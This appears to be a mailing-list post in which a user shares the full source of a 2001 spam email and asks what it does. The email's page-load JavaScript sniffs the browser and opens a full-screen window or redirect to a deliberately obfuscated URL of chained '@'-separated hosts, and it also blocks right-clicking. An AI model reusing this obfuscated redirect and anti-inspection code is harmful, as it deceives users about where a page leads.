I got an interesting piece of spam today, and I'm not entirely sure what
it's doing.
the source code:
----------------------------------------------------------
Return-Path: <tomjones@otenet.gr>
Received: from mh7-sfba.mail.home.com ([24.0.95.236])
by mail1.rdc1.az.home.com (InterMail vM.4.01.03.00 201-229-121)
with ESMTP
id
<20010329180004.XIVE9238.mail1.rdc1.az.home.com@mh7-sfba.mail.home.com>
for <lucas7@mail.phnx3.az.home.com>;
Thu, 29 Mar 2001 10:00:04 -0800
Received: from mx7-sfba.mail.home.com (mx7-sfba.mail.home.com [24.0.95.232])
by mh7-sfba.mail.home.com (8.9.3/8.9.0) with ESMTP id KAA23931
for <lucas7@home.com>; Thu, 29 Mar 2001 10:00:03 -0800 (PST)
From: tomjones@otenet.gr
Received: from 96139.com ([202.107.34.130])
by mx7-sfba.mail.home.com (8.11.1/8.11.1) with ESMTP id f2TI01p20903
for <lucas7@home.com>; Thu, 29 Mar 2001 10:00:01 -0800 (PST)
Received: from PACMAN_[207.94.232.21] [207.94.232.21] by 96139.com
(SMTPD32-6.06 EVAL) id A4716A0114; Thu, 29 Mar 2001 20:02:57 +0800
Received: from mail-in.pol.net.uk by PACMAN with ESMTP; Thu, 29 Mar 2001
06:04:27 -0600
Message-ID: <00005e014f59$000064fc$000013d6@mail-in.pol.net.uk>
To: <sueallendo4955@desertmail.com>
Subject: The economy needs a 2nd wind 5078
Date: Thu, 29 Mar 2001 06:04:20 -0600
MIME-Version: 1.0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3
X-MSMail-Priority: Normal
Reply-To: bobsuejones454@arabia.com
<HTML>
<BODY>
<HEAD>
<meta http-equiv=3D"Page-Enter" CONTENT=3D"RevealTrans(Duration=3D4,Transi=
tion=3D10)">
<script language=3D"JavaScript"> <!--
var message=3D"Sorry, that function is disabled."; // Message for the aler=
t box
// Don't edit below!
function closeit() {
window.close()
}
function intro()
{
if ((navigator.appVersion.indexOf("Mac")!=3D-1) &&
(navigator.userAgent.indexOf("MSIE")!=3D-1) &&
(parseInt(navigator.appVersion)=3D=3D4))
{
skip()
}
else
{
popup()
}
}
function skip()
{
location.href=3D"http://www.hongkong.com";
}
function popup()
{
version =3D
parseFloat(navigator.appVersion.substring(navigator.appVersio=
n.indexOf('.')-1,navigator.appVersion.length));
if (version >=3D 4)
version =3D
parseFloat(navigator.appVersion.substring(navigator.appVersio=
n.indexOf('.')-1,navigator.appVersion.length));
if (version >=3D 4)
{
if (navigator.appName=3D=3D"Netscape")
{
Hello =3D window.open("http://www.members.geocities.com%40www.foreigne=
xchange.i85.net%40www.cybercafe.envy.nu:209.247.194.44=3Dredirect=3D%40www=
myplaceonthenet.hypermart.net+cgi=3DSource&Location_override=3Dwww.curren=
cyexchange.com@myside.bizland.com/=3D?redirect=3D209.185.151.131@www.curdi=
gitaldatastreamcomputernetworking.com/redirect.cgi?-refer#4908732?http://g=
eocities.net/majorcomputernetworking:endofline.com?needanumeralhexadec.com=
:1.5.4://redirect?ebay.com/hobbies/http://mnumeralhexadec.com?12.5.102.4?d=
igitaldatastreamcomputernetworking.com/main.html?http://geocities.net/majo=
rcomputernetworking:endofline.com?http://www.delhadata.com:1.5.4://redirec=
t:ebay.com/hobbies/http://mnumeralhexadecimal.com?12.5.102.4/","Hello","sc=
rollbars");
Hello.focus();
}
if (navigator.appName=3D=3D"Microsoft Internet Explorer")
{
window.open("http://www.members.geocities.com%40www.foreignexchange.i85=
net%40www.cybercafe.envy.nu:209.247.194.44=3Dredirect=3D%40www.myplaceont=
henet.hypermart.net+cgi=3DSource&Location_override=3Dwww.currencyexchange.=
com@myside.bizland.com/=3D?redirect=3D209.185.151.131@www.curdigitaldatast=
reamcomputernetworking.com/redirect.cgi?-refer#4908732?http://geocities.ne=
t/majorcomputernetworking:endofline.com?needanumeralhexadec.com:1.5.4://re=
direct?ebay.com/hobbies/http://mnumeralhexadec.com?12.5.102.4?digitaldatas=
treamcomputernetworking.com/main.html?http://geocities.net/majorcomputerne=
tworking:endofline.com?http://www.delhadata.com:1.5.4://redirect:ebay.com/=
hobbies/http://mnumeralhexadecimal.com?12.5.102.4/","screen","fullscreen=3D=
yes");
}
}
else
{
location.href=3D"http://www.members.geocities.com%40www.foreignexchange.=
i85.net%40www.cybercafe.envy.nu:209.247.194.44=3Dredirect=3D%40www.myplace=
onthenet.hypermart.net+cgi=3DSource&Location_override=3Dwww.currencyexchan=
ge.com@myside.bizland.com/=3D?redirect=3D209.185.151.131@www.curdigitaldat=
astreamcomputernetworking.com/redirect.cgi?-refer#4908732?http://geocities=
net/majorcomputernetworking:endofline.com?needanumeralhexadec.com:1.5.4:/=
/redirect?ebay.com/hobbies/http://mnumeralhexadec.com?12.5.102.4?digitalda=
tastreamcomputernetworking.com/main.html?http://geocities.net/majorcompute=
rnetworking:endofline.com?http://www.delhadata.com:1.5.4://redirect:ebay.c=
om/hobbies/http://mnumeralhexadecimal.com?12.5.102.4/";
}
}
function click(e) {
if (document.all) {
if (event.button =3D=3D 2) {
alert(message);
return false;
}
}
if (document.layers) {
if (e.which =3D=3D 3) {
alert(message);
return false;
}
}
}
if (document.layers) {
document.captureEvents(Event.MOUSEDOWN);
}
document.onmousedown=3Dclick;
// --> </script>
<META NAME=3D"GENERATOR" Content=3D"Microsoft FrontPage 4.0">
<META HTTP-EQUIV=3D"Content-Type"
CONTENT=3D"text/html;CHARSET=3Diso-8859=
-1">
<TITLE>Hello</TITLE>
</HEAD>
<BODY BGCOLOR=3D"#0000AA" LINK=3D"#000000" onLoad=3D"intro()">
<P><SCRIPT LANGUAGE=3D"Javascript">
</SCRIPT>
</BODY>
</HTML>
<p><p><p><p><p><p><p><p><p><p>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"><p><HTML><p><p><p><p>
</BODY>
</HTML>
----------------------
Lucas
(text/plain)